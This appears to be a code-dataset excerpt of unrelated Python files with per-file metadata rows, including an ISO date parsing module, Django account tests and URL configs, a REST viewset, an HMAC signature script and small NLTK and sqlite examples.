isoweektimeRE = re.compile(_weekdate + '(?:[ T]' + _time + ')?$')
def WeekTime(year,isoweek=1,isoday=1,hour=0,minute=0,second=0.0):

    """ Week(year,isoweek=1,isoday=1,hour=0,minute=0,second=0.0)

        Returns a DateTime instance pointing to the given ISO week and
        day.  isoday defaults to 1, which corresponds to Monday in the
        ISO numbering.  The time part is set as given.

    """
    # Start from Jan 1st of the requested year carrying the time part,
    # then shift by whole days to land on the requested ISO week/day.
    # NOTE(review): assumes mx.DateTime's day_of_week is 0 for Monday
    # and iso_week[0] is the ISO year of the instance -- confirm against
    # the mx.DateTime documentation.
    d = DateTime.DateTime(year,1,1,hour,minute,second)
    if d.iso_week[0] == year:
        # 1.1. belongs to year (backup to Monday)
        return d + (-d.day_of_week + 7 * (isoweek-1) + isoday-1)
    else:
        # 1.1. belongs to year-1 (advance to next Monday)
        return d + (7-d.day_of_week + 7 * (isoweek-1) + isoday-1)
# Alias: Week(...) is the same constructor as WeekTime(...)
Week = WeekTime

# Aliases for the other constructors (they all happen to already use
# ISO format)
Date = DateTime.Date
Time = DateTime.Time
TimeDelta = DateTime.TimeDelta
def ParseDateTime(isostring, parse_isodatetime=isodatetimeRE.match):

    """ ParseDateTime(isostring)

        Returns a DateTime instance reflecting the given ISO date. A
        time part is optional and must be delimited from the date by a
        space or 'T'.

        Time zone information is parsed, but not evaluated.

        Raises ValueError when the string does not match the grammar.

    """
    s = isostring.strip()
    date = parse_isodatetime(s)
    if not date:
        # call syntax so the raise works on both Python 2 and Python 3
        # (the old `raise ValueError,'msg'` form is Python 2 only)
        raise ValueError('wrong format, use YYYY-MM-DD HH:MM:SS')
    year, month, day, hour, minute, second, zone = date.groups()
    # every component but the year is optional in the grammar; missing
    # parts default to the start of the period (Jan 1st, midnight)
    year = int(year)
    month = int(month) if month is not None else 1
    day = int(day) if day is not None else 1
    hour = int(hour) if hour is not None else 0
    minute = int(minute) if minute is not None else 0
    second = float(second) if second is not None else 0.0
    return DateTime.DateTime(year, month, day, hour, minute, second)
def ParseDateTimeGMT(isostring, parse_isodatetime=isodatetimeRE.match):

    """ ParseDateTimeGMT(isostring)

        Returns a DateTime instance in UTC reflecting the given ISO
        date. A time part is optional and must be delimited from the
        date by a space or 'T'. Timezones are honored.

        Raises ValueError when the string does not match the grammar.

    """
    s = isostring.strip()
    date = parse_isodatetime(s)
    if not date:
        # call syntax so the raise works on both Python 2 and Python 3
        raise ValueError('wrong format, use YYYY-MM-DD HH:MM:SS')
    year, month, day, hour, minute, second, zone = date.groups()
    # missing optional parts default to the start of the period
    year = int(year)
    month = int(month) if month is not None else 1
    day = int(day) if day is not None else 1
    hour = int(hour) if hour is not None else 0
    minute = int(minute) if minute is not None else 0
    second = float(second) if second is not None else 0.0
    # subtract the zone's UTC offset to normalize the result to UTC
    offset = Timezone.utc_offset(zone)
    return DateTime.DateTime(year, month, day, hour, minute, second) - offset

# Alias
ParseDateTimeUTC = ParseDateTimeGMT
def ParseDate(isostring, parse_isodate=isodateRE.match):

    """ ParseDate(isostring)

        Returns a DateTime instance reflecting the given ISO date. A
        time part may not be included.

        Raises ValueError when the string does not match the grammar.

    """
    s = isostring.strip()
    date = parse_isodate(s)
    if not date:
        # call syntax so the raise works on both Python 2 and Python 3
        raise ValueError('wrong format, use YYYY-MM-DD')
    year, month, day = date.groups()
    # month and day are optional; default to January 1st
    year = int(year)
    month = int(month) if month is not None else 1
    day = int(day) if day is not None else 1
    return DateTime.DateTime(year, month, day)
def ParseWeek(isostring, parse_isoweek=isoweekRE.match):

    """ ParseWeek(isostring)

        Returns a DateTime instance reflecting the given ISO week date.
        A time part may not be included.

        Raises ValueError when the string does not match the grammar.

    """
    s = isostring.strip()
    date = parse_isoweek(s)
    if not date:
        # call syntax so the raise works on both Python 2 and Python 3
        raise ValueError('wrong format, use yyyy-Www-d, e.g. 1998-W01-1')
    year, week, day = date.groups()
    # week and day are optional; default to the first week's Monday
    year = int(year)
    week = int(week) if week is not None else 1
    day = int(day) if day is not None else 1
    return Week(year, week, day)
def ParseWeekTime(isostring, parse_isoweektime=isoweektimeRE.match):

    """ ParseWeekTime(isostring)

        Returns a DateTime instance reflecting the given ISO week date.
        A time part is optional and must be delimited from the date by
        a space or 'T'.

        Raises ValueError when the string does not match the grammar.

    """
    s = isostring.strip()
    date = parse_isoweektime(s)
    if not date:
        # call syntax so the raise works on both Python 2 and Python 3
        raise ValueError('wrong format, use e.g. "1998-W01-1 12:00:30"')
    year, week, day, hour, minute, second, zone = date.groups()
    # missing optional parts default to the start of the period
    year = int(year)
    week = int(week) if week is not None else 1
    day = int(day) if day is not None else 1
    hour = int(hour) if hour is not None else 0
    minute = int(minute) if minute is not None else 0
    second = float(second) if second is not None else 0.0
    return WeekTime(year, week, day, hour, minute, second)
def ParseTime(isostring, parse_isotime=isotimeRE.match):

    """ ParseTime(isostring)

        Returns a DateTimeDelta instance reflecting the given ISO time.
        Hours and minutes must be given, seconds are
        optional. Fractions of a second may also be used,
        e.g. 12:23:12.34.

        Raises ValueError when the string does not match the grammar.

    """
    s = isostring.strip()
    time = parse_isotime(s)
    if not time:
        # call syntax so the raise works on both Python 2 and Python 3
        raise ValueError('wrong format, use HH:MM:SS')
    hour, minute, second, zone = time.groups()
    hour = int(hour)
    minute = int(minute)
    # seconds are optional; default to 0.0
    second = float(second) if second is not None else 0.0
    return DateTime.TimeDelta(hour, minute, second)
def ParseTimeDelta(isostring, parse_isodelta=isodeltaRE.match):

    """ ParseTimeDelta(isostring)

        Returns a DateTimeDelta instance reflecting the given ISO time
        as delta. Hours and minutes must be given, seconds are
        optional. Fractions of a second may also be used,
        e.g. 12:23:12.34. In addition to the ISO standard a sign may be
        prepended to the time, e.g. -12:34.

        Raises ValueError when the string does not match the grammar.

    """
    s = isostring.strip()
    time = parse_isodelta(s)
    if not time:
        # call syntax so the raise works on both Python 2 and Python 3
        raise ValueError('wrong format, use [-]HH:MM:SS')
    sign, hour, minute, second, zone = time.groups()
    hour = int(hour)
    minute = int(minute)
    # seconds are optional; default to 0.0
    second = float(second) if second is not None else 0.0
    delta = DateTime.TimeDelta(hour, minute, second)
    # a leading '-' negates the whole delta
    if sign and sign == '-':
        return -delta
    return delta
def ParseAny(isostring):

    """ ParseAny(isostring)

        Parses the given string and tries to convert it to a
        DateTime[Delta] instance.

        Tries, in order: full date/time, week date/time, time delta.
        Raises ValueError when none of the grammars match.

    """
    try:
        return ParseDateTime(isostring)
    except ValueError:
        pass
    try:
        return ParseWeekTime(isostring)
    except ValueError:
        pass
    try:
        return ParseTimeDelta(isostring)
    except ValueError:
        # call syntax so the raise works on both Python 2 and Python 3
        raise ValueError('unsupported format: "%s"' % isostring)
def str(datetime,tz=None):

    """ str(datetime,tz=DateTime.tz_offset(datetime))

        Returns the datetime instance as ISO date string. tz can be
        given as DateTimeDelta instance providing the time zone
        difference from datetime's zone to UTC. It defaults to
        DateTime.tz_offset(datetime) which assumes local time.

        NOTE: this function deliberately shadows the builtin str()
        inside this module's namespace (it is meant to be used as
        ISO.str()).

    """
    if tz is None:
        tz = datetime.gmtoffset()
    # NOTE(review): for negative offsets tz.minute is presumably negative
    # too, so '%02i' would emit a second sign (e.g. '-05-30') -- confirm
    # against mx.DateTime's DateTimeDelta attribute semantics.
    return '%04i-%02i-%02i %02i:%02i:%02i%+03i%02i' % (
        datetime.year, datetime.month, datetime.day,
        datetime.hour, datetime.minute, datetime.second,
        tz.hour,tz.minute)
def strGMT(datetime):

    """ strGMT(datetime)

        Returns the datetime instance as ISO date string assuming it is
        given in GMT (hence the fixed '+0000' zone suffix).

    """
    iso_format = '%04i-%02i-%02i %02i:%02i:%02i+0000'
    fields = (datetime.year, datetime.month, datetime.day,
              datetime.hour, datetime.minute, datetime.second)
    return iso_format % fields
def strUTC(datetime):

    """ strUTC(datetime)

        Returns the datetime instance as ISO date string assuming it is
        given in UTC (hence the fixed '+0000' zone suffix).

    """
    parts = (datetime.year, datetime.month, datetime.day,
             datetime.hour, datetime.minute, datetime.second)
    return '%04i-%02i-%02i %02i:%02i:%02i+0000' % parts
# Testing
if __name__ == '__main__':
    # Self-test: round-trip every day from 1900-01-01 for 100000 days
    # through iso_week and WeekTime() and report any mismatch.  Uses
    # parenthesised print so the check runs on both Python 2 and 3
    # (the original bare `print` statements are Python 2 only).
    e = DateTime.Date(1900,1,1)
    for i in range(100000):
        d = e + i
        year,week,day = d.iso_week
        c = WeekTime(year,week,day)
        if d != c:
            print(' Check %s (given; %i) != %s (parsed)' % (d,d.day_of_week,c))
        elif i % 1000 == 0:
            # progress marker every 1000 days
            print('%s ok' % d)
| 28.232295 | 78 | 0.616396 | 1,347 | 9,966 | 4.512992 | 0.164811 | 0.01974 | 0.034216 | 0.024182 | 0.583649 | 0.548939 | 0.519658 | 0.492351 | 0.492351 | 0.453858 | 0 | 0.024527 | 0.26771 | 9,966 | 352 | 79 | 28.3125 | 0.808441 | 0.024082 | 0 | 0.613953 | 0 | 0 | 0.09259 | 0.007515 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.009302 | 0.009302 | null | null | 0.009302 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a53556e93e0bdd6cf21ccc8be26e03130064d64a | 5,309 | py | Python | tests/test_accounts.py | thesus/claypot | ce6871bd2de7a01c31448323753168115114087c | [
"MIT"
] | null | null | null | tests/test_accounts.py | thesus/claypot | ce6871bd2de7a01c31448323753168115114087c | [
"MIT"
] | null | null | null | tests/test_accounts.py | thesus/claypot | ce6871bd2de7a01c31448323753168115114087c | [
"MIT"
] | null | null | null | import pytest
from django.urls import reverse
from django.test import override_settings
from django.contrib.auth import authenticate
@pytest.mark.django_db
def test_login(api_client, django_user_model):
    """Tests the ability to login.

    Covers: a successful login (redirect to the profile detail view),
    a wrong password, and a login attempt for a deactivated account.
    """
    username = "user"
    password = "userpassword"
    user = django_user_model.objects.create_user(username=username, password=password)

    response = api_client.post(
        reverse("api:accounts-login"), {"username": username, "password": password}
    )
    # User should be redirected to the profile
    assert response.status_code == 302
    assert response.url == reverse("api:accounts-detail", kwargs={"pk": user.pk})

    # Try wrong password
    response = api_client.post(
        reverse("api:accounts-login"),
        {"username": username, "password": password + "_"},
    )
    assert response.status_code == 400

    # Disable user: even correct credentials must be rejected now
    user.is_active = False
    user.save()
    response = api_client.post(
        reverse("api:accounts-login"), {"username": username, "password": password}
    )
    assert response.status_code == 400
@pytest.mark.django_db
def test_account_permissions(api_client, user, admin_user):
    """Tests permission on profiles.

    Anonymous: no access; regular users: only their own profile;
    admins: any profile.
    """
    # Anonymous request is rejected
    assert (
        api_client.get(
            reverse("api:accounts-detail", kwargs={"pk": user.pk})
        ).status_code
        == 403
    )

    # Users should only be able to see themselves
    api_client.force_login(user)
    assert (
        api_client.get(
            reverse("api:accounts-detail", kwargs={"pk": user.pk})
        ).status_code
        == 200
    )
    assert (
        api_client.get(
            reverse("api:accounts-detail", kwargs={"pk": admin_user.pk})
        ).status_code
        == 403
    )

    # Admins should be able to see all users
    api_client.force_login(admin_user)
    assert (
        api_client.get(
            reverse("api:accounts-detail", kwargs={"pk": user.pk})
        ).status_code
        == 200
    )
@pytest.mark.django_db
def test_logout(api_client, user):
    """Tests if users are logged out correctly."""
    api_client.force_login(user)
    # the session key proves an authenticated session exists
    assert "_auth_user_id" in api_client.session.keys()

    response = api_client.post(reverse("api:accounts-logout"))
    assert response.status_code == 200
    # ...and is gone after logout
    assert not "_auth_user_id" in api_client.session.keys()
@pytest.mark.django_db
def test_create_new_account(api_client, mailoutbox, django_user_model):
    """Tests creation of a new account.

    Signs up, checks the user starts inactive, follows the activation
    link from the confirmation email, and verifies the link is
    single-use.
    """
    response = api_client.post(
        reverse("api:accounts-signup"),
        {
            "password1": "password",
            "password2": "password",
            "username": "user",
            "email": "user@test.tld",
        },
    )
    user = django_user_model.objects.get(username="user")

    # Check email and extract link
    assert response.status_code == 200
    assert not user.is_active
    assert len(mailoutbox) == 1
    assert list(mailoutbox[0].to) == ["user@test.tld"]
    # NOTE(review): the activation URL is assumed to be line 8 of the
    # mail body -- brittle if the email template changes.
    url = mailoutbox[0].body.splitlines()[7]

    # Activate account
    response = api_client.get(url)
    # Do query again, user changed in the database
    user = django_user_model.objects.get(username="user")

    # Redirect to home page
    assert response.status_code == 302
    assert user.is_active

    # Link should be invalid by now
    response = api_client.get(url)
    assert response.status_code == 400
def test_invalid_account_links(api_client):
    """Tests if account activation can handle broken links."""
    # Run without token and uid parameters
    response = api_client.get(reverse("api:accounts-signup-confirm"))
    assert response.status_code == 400

    # Run with invalid token and uid
    response = api_client.get(
        reverse("api:accounts-signup-confirm") + "?token=bs&uid=r23"
    )
    assert response.status_code == 400
@override_settings(SIGNUP_TIMEOUT_DAYS=-1)
def test_expired_account_link(api_client, django_user_model, mailoutbox):
    """Tests if account activation renews activation link after the given timeout.

    SIGNUP_TIMEOUT_DAYS=-1 makes every activation link expire
    immediately.

    NOTE(review): unlike its siblings this test carries no
    @pytest.mark.django_db marker although it creates a user --
    presumably database access is granted via a fixture; confirm.
    """
    response = api_client.post(
        reverse("api:accounts-signup"),
        {
            "password1": "password",
            "password2": "password",
            "username": "user",
            "email": "user@test.tld",
        },
    )
    # activation URL assumed to be line 8 of the mail body
    url = mailoutbox[0].body.splitlines()[7]
    response = api_client.get(url)
    assert response.status_code == 400

    # Link should be sent again in an email after clicking on the expired link.
    assert len(mailoutbox) == 2
@pytest.mark.django_db
def test_password_reset(api_client, user, mailoutbox):
    """Tests resetting of a user password.

    Requests a reset email, extracts uid/token from the link, submits a
    new password and verifies it authenticates.
    """
    user.email = "user@test.tld"
    user.save()

    response = api_client.post(reverse("api:accounts-reset"), {"email": user.email})
    assert response.status_code == 200
    assert len(mailoutbox) == 1

    # uid and token are the last two path segments of the link on line 8
    # of the mail body
    uid, token = mailoutbox[0].body.splitlines()[7].split("/")[-2:]

    password = "apfelmus"
    response = api_client.post(
        reverse("api:accounts-reset-confirm"),
        {
            "token": token,
            "uid": uid,
            "new_password1": password,
            "new_password2": password,
        },
    )
    assert response.status_code == 200
    # the new password must now authenticate
    assert authenticate(username=user.username, password=password) is not None
| 27.507772 | 86 | 0.645319 | 648 | 5,309 | 5.132716 | 0.217593 | 0.078473 | 0.081179 | 0.086591 | 0.594107 | 0.53187 | 0.434155 | 0.400782 | 0.330728 | 0.262778 | 0 | 0.01672 | 0.233942 | 5,309 | 192 | 87 | 27.651042 | 0.801082 | 0.135995 | 0 | 0.536 | 0 | 0 | 0.139238 | 0.017625 | 0 | 0 | 0 | 0 | 0.208 | 1 | 0.056 | false | 0.112 | 0.032 | 0 | 0.088 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a539c03f1559c0cb02ad04dfca283b2e99e15c10 | 362 | py | Python | messier_objects/views.py | DanielPDWalker/Astrophoto | 9a7ee59deb291617baa3ab8724b8ce5970e6ea9f | [
"MIT"
] | null | null | null | messier_objects/views.py | DanielPDWalker/Astrophoto | 9a7ee59deb291617baa3ab8724b8ce5970e6ea9f | [
"MIT"
] | 12 | 2020-07-26T06:20:22.000Z | 2022-03-12T00:43:09.000Z | messier_objects/views.py | DanielPDWalker/Astrophoto-API | 9a7ee59deb291617baa3ab8724b8ce5970e6ea9f | [
"MIT"
] | null | null | null | from rest_framework import viewsets, permissions
from messier_objects import serializers, models
class MessierViewSet(viewsets.ModelViewSet):
    """Messier Object API View.

    Standard ModelViewSet CRUD over all MessierObject rows.
    """

    serializer_class = serializers.MessierSerializer
    queryset = models.MessierObject.objects.all()
    # Anonymous users get read-only access; writes require authentication.
    permission_classes = (
        permissions.IsAuthenticatedOrReadOnly,
    )
| 27.846154 | 52 | 0.770718 | 33 | 362 | 8.333333 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160221 | 362 | 12 | 53 | 30.166667 | 0.904605 | 0.063536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a53fc0be336ea6ad0f0c4d26a91c1ed745c86270 | 398 | py | Python | setup.py | humantech/smush.py | f722c89ae2d9405ac0c183224fdcd59dd4246944 | [
"MIT"
] | null | null | null | setup.py | humantech/smush.py | f722c89ae2d9405ac0c183224fdcd59dd4246944 | [
"MIT"
] | null | null | null | setup.py | humantech/smush.py | f722c89ae2d9405ac0c183224fdcd59dd4246944 | [
"MIT"
] | null | null | null | from distutils.core import setup
setup(name='Smush',
version='1.0',
description='Lossless image optimiser script',
url='https://github.com/thebeansgroup/smush.py',
platforms='OS Independent',
keywords="image optimize lossless",
scripts=['bin/smush_it'],
packages=['smush', 'smush.optimisers', 'smush.optimisers.formats'],
include_package_data=True
) | 33.166667 | 73 | 0.678392 | 45 | 398 | 5.933333 | 0.8 | 0.11236 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006098 | 0.175879 | 398 | 12 | 74 | 33.166667 | 0.807927 | 0 | 0 | 0 | 0 | 0 | 0.43609 | 0.06015 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a54633e17d7fbb56c1a0df03249c89028178ec7b | 190 | py | Python | SQLITE3 & python/SQLITE3 update data from database.py | OSAMAMOHAMED1234/python_projects | fb4bc7356847c3f46df690a9386cf970377a6f7c | [
"MIT"
] | null | null | null | SQLITE3 & python/SQLITE3 update data from database.py | OSAMAMOHAMED1234/python_projects | fb4bc7356847c3f46df690a9386cf970377a6f7c | [
"MIT"
] | null | null | null | SQLITE3 & python/SQLITE3 update data from database.py | OSAMAMOHAMED1234/python_projects | fb4bc7356847c3f46df690a9386cf970377a6f7c | [
"MIT"
] | null | null | null | import sqlite3
con = sqlite3.connect("database.db")
c = con.cursor()
c.execute("UPDATE names SET fname='OSAMA', lname='MOHAMED', age=22, salary=5000 WHERE age=20")
con.commit()
con.close()
| 23.75 | 94 | 0.715789 | 30 | 190 | 4.533333 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.105263 | 190 | 7 | 95 | 27.142857 | 0.741176 | 0 | 0 | 0 | 0 | 0.166667 | 0.484211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a55af0b704a4ce32a2e43a1d3948451e253423f2 | 334 | py | Python | meiduo_mall/meiduo_mall/apps/orders/urls.py | Nicholas-violet/meiduo_project_preview | 3c17fa45d11a8889710ca7a522ac047bb99b21b8 | [
"MIT"
] | 2 | 2020-06-19T11:53:02.000Z | 2020-06-24T06:25:00.000Z | meiduo_mall/meiduo_mall/apps/orders/urls.py | Nicholas-violet/meiduo_project_preview | 3c17fa45d11a8889710ca7a522ac047bb99b21b8 | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/orders/urls.py | Nicholas-violet/meiduo_project_preview | 3c17fa45d11a8889710ca7a522ac047bb99b21b8 | [
"MIT"
] | null | null | null | from django.urls import path,re_path
from . import views
# urlpatterns是被Django自动识别的路由列表变量:定义该应用的所有路由信息
urlpatterns = [
# 函数视图路由语法:
# path('网络地址正则表达式', 函数视图名),
# 订单确认
re_path(r'^orders/settlement/$', views.OrderSettlementView.as_view()),
# 订单提交
re_path(r'^orders/commit/$', views.OrderCommitView.as_view()),
] | 25.692308 | 74 | 0.703593 | 37 | 334 | 6.216216 | 0.621622 | 0.078261 | 0.06087 | 0.113043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155689 | 334 | 13 | 75 | 25.692308 | 0.815603 | 0.266467 | 0 | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a55b3814136e22e453c8afa8c9dd21b989ed96dd | 857 | py | Python | dapricot/auth/migrations/0002_auto_20190602_1858.py | softapr/django_apricot | 911b6627a5ffaf3f7b13a099ca129f3a2ffda558 | [
"BSD-3-Clause"
] | null | null | null | dapricot/auth/migrations/0002_auto_20190602_1858.py | softapr/django_apricot | 911b6627a5ffaf3f7b13a099ca129f3a2ffda558 | [
"BSD-3-Clause"
] | null | null | null | dapricot/auth/migrations/0002_auto_20190602_1858.py | softapr/django_apricot | 911b6627a5ffaf3f7b13a099ca129f3a2ffda558 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.2.1 on 2019-06-02 18:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('daauth', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='permissionsmixin',
options={},
),
migrations.AlterModelOptions(
name='user',
options={},
),
migrations.AddField(
model_name='user',
name='username',
field=models.CharField(default='', max_length=30, unique=True, verbose_name='username'),
preserve_default=False,
),
migrations.AlterField(
model_name='user',
name='avatar',
field=models.ImageField(blank=True, null=True, upload_to='dapricot/avatars/'),
),
]
| 25.969697 | 100 | 0.556593 | 77 | 857 | 6.103896 | 0.662338 | 0.051064 | 0.131915 | 0.07234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036021 | 0.31972 | 857 | 32 | 101 | 26.78125 | 0.770154 | 0.052509 | 0 | 0.384615 | 1 | 0 | 0.104938 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a55f53f0be49a0b321987cd51bf4465fd768df66 | 392 | py | Python | ch7_Extracting_Information_from_Text/chinker.py | MingjunZhou/nltk_book | 62eef0f5a1855e3d6c523a8d58e8725f459d2fbd | [
"BSD-3-Clause"
] | 1 | 2015-01-06T11:37:14.000Z | 2015-01-06T11:37:14.000Z | ch7_Extracting_Information_from_Text/chinker.py | MingjunZhou/nltk_book | 62eef0f5a1855e3d6c523a8d58e8725f459d2fbd | [
"BSD-3-Clause"
] | null | null | null | ch7_Extracting_Information_from_Text/chinker.py | MingjunZhou/nltk_book | 62eef0f5a1855e3d6c523a8d58e8725f459d2fbd | [
"BSD-3-Clause"
] | null | null | null | import nltk
grammar = r"""
NP:
{<.*>+} # Chunk everything
}<VBD|IN>+{ # Chink sequences of VBD and IN
"""
sentence = [("the", "DT"), ("little", "JJ"), ("yellow", "JJ"),
("dog", "NN"), ("barked", "VBD"), ("at", "IN"),
("the", "DT"), ("cat", "NN")]
cp = nltk.RegexpParser(grammar)
print cp.parse(sentence)
| 28 | 64 | 0.423469 | 40 | 392 | 4.15 | 0.7 | 0.060241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.331633 | 392 | 13 | 65 | 30.153846 | 0.633588 | 0 | 0 | 0 | 0 | 0 | 0.477041 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a56885a39dbbbead3dafd870f9aae47fc24d841e | 1,739 | py | Python | util/sigen.py | cubicdaiya/ngx_access_token | 27bab29e718684b8b02ed3153cdecac83b66b2bf | [
"MIT"
] | 5 | 2015-12-21T16:29:02.000Z | 2019-03-19T08:13:51.000Z | util/sigen.py | RekGRpth/ngx_access_token | 27bab29e718684b8b02ed3153cdecac83b66b2bf | [
"MIT"
] | null | null | null | util/sigen.py | RekGRpth/ngx_access_token | 27bab29e718684b8b02ed3153cdecac83b66b2bf | [
"MIT"
] | 2 | 2016-04-14T23:39:56.000Z | 2019-03-19T08:13:52.000Z | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Tatsuhiko Kubo <cubicdaiya@gmail.com>
#
# signature generator
#
import sys
import hmac
from hashlib import sha1
import base64
import binascii
import argparse
def build_parser():
    """Build the command line parser for the signature generator."""
    parser = argparse.ArgumentParser(description='Signature Generator', add_help=False)
    # (short, long, help text, required) for every string-valued option
    string_options = (
        ('-p', '--public', 'public-key', False),
        ('-s', '--secret', 'secret-key', True),
        ('-m', '--method', 'http-method', False),
        ('-u', '--uri', 'uri', False),
        ('-t', '--time', 'epoch', False),
        ('-r', '--raw', 'http-method + uri + epoch + public-key', False),
    )
    for short_opt, long_opt, help_text, is_required in string_options:
        parser.add_argument(short_opt, long_opt, action='store', type=str,
                            help=help_text, required=is_required)
    parser.add_argument('--help', action='store_true', default=False,
                        help='show this help message and exit')
    return parser
def build_raw(args):
    """Concatenate method + uri + epoch + public key into the raw string
    that gets signed.

    Raises ValueError when any required component is missing (the
    caller catches this and falls back to printing the usage help).
    """
    if args.public is None or \
       args.method is None or \
       args.uri is None or \
       args.time is None:
        # a descriptive exception instead of the former bare
        # `raise Exception`; ValueError is still caught by existing
        # broad handlers
        raise ValueError('method, uri, time and public key are all '
                         'required to build the raw signature string')
    return args.method + args.uri + args.time + args.public
if __name__ == '__main__':
    # Parse options; a raw string (-r) overrides the individual parts.
    parser = build_parser()
    args = parser.parse_args()
    if args.help:
        parser.print_help()
        sys.exit(0)
    if args.raw is not None:
        raw = args.raw
    else:
        try:
            raw = build_raw(args)
        except Exception:
            # missing components: show usage instead of a traceback
            parser.print_help()
            sys.exit(0)
    # encode explicitly: hmac.new() requires bytes on Python 3 (a no-op
    # on Python 2, where str already is a byte string)
    hashed = hmac.new(args.secret.encode('utf-8'), raw.encode('utf-8'), sha1)
    # base64-encode the digest and drop the trailing newline; the print
    # call syntax works on both Python 2 and 3
    print(binascii.b2a_base64(hashed.digest())[:-1].decode('ascii'))
| 32.811321 | 124 | 0.608396 | 224 | 1,739 | 4.611607 | 0.357143 | 0.060987 | 0.115198 | 0.10455 | 0.242014 | 0.106486 | 0.061955 | 0 | 0 | 0 | 0 | 0.011398 | 0.243243 | 1,739 | 52 | 125 | 33.442308 | 0.773556 | 0.056354 | 0 | 0.102564 | 0 | 0 | 0.142595 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a56c92342f31e1936472ed752e5069e6745f8cfc | 699 | py | Python | game_hub/game_hub/accounts/urls.py | ivailoiliev84/GameHub | 2c3ef225da9e2e0177c2cab781328ded73ad8720 | [
"MIT"
] | null | null | null | game_hub/game_hub/accounts/urls.py | ivailoiliev84/GameHub | 2c3ef225da9e2e0177c2cab781328ded73ad8720 | [
"MIT"
] | null | null | null | game_hub/game_hub/accounts/urls.py | ivailoiliev84/GameHub | 2c3ef225da9e2e0177c2cab781328ded73ad8720 | [
"MIT"
] | null | null | null | from django.urls import path
from game_hub.accounts.views import RegisterUser, logout_user, ProfilePageView, \
LoginUserView, ChangePasswordView, ProfileEditView, ProfileDeleteView
urlpatterns = (
path('register/', RegisterUser.as_view(), name='register'),
path('log-in/', LoginUserView.as_view(), name='login'),
path('log-out/', logout_user, name='logout'),
path('change-password/', ChangePasswordView.as_view(), name='change password'),
path('profile/', ProfilePageView.as_view(), name='profile'),
